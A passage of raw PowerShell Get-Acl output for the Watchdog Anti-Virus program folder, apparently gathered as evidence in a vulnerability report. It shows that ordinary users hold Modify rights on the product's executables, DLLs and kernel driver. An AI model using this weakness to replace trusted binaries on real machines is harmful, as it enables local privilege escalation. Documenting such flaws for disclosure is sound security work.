x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\log4net.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\Microsoft.Win32.SystemEvents.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\msvcp140d.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\Newtonsoft.Json.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\sciter.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\sentry.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\Setup.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\sfc.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Configuration.ConfigurationManager.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Diagnostics.EventLog.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Diagnostics.EventLog.Messages.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\System.Drawing.Common.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Security.Cryptography.ProtectedData.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Security.Permissions.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\System.Threading.AccessControl.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\ucrtbased.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\unins000.dat
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\unins000.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\vcruntime140d.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\vcruntime140_1.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\vcruntime140_1d.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.deps.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.deps.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.runtimeconfig.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Domain.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.runtimeconfig.json
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Sciter.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.SDK.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Shared.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-driver.sys
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\attachments
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
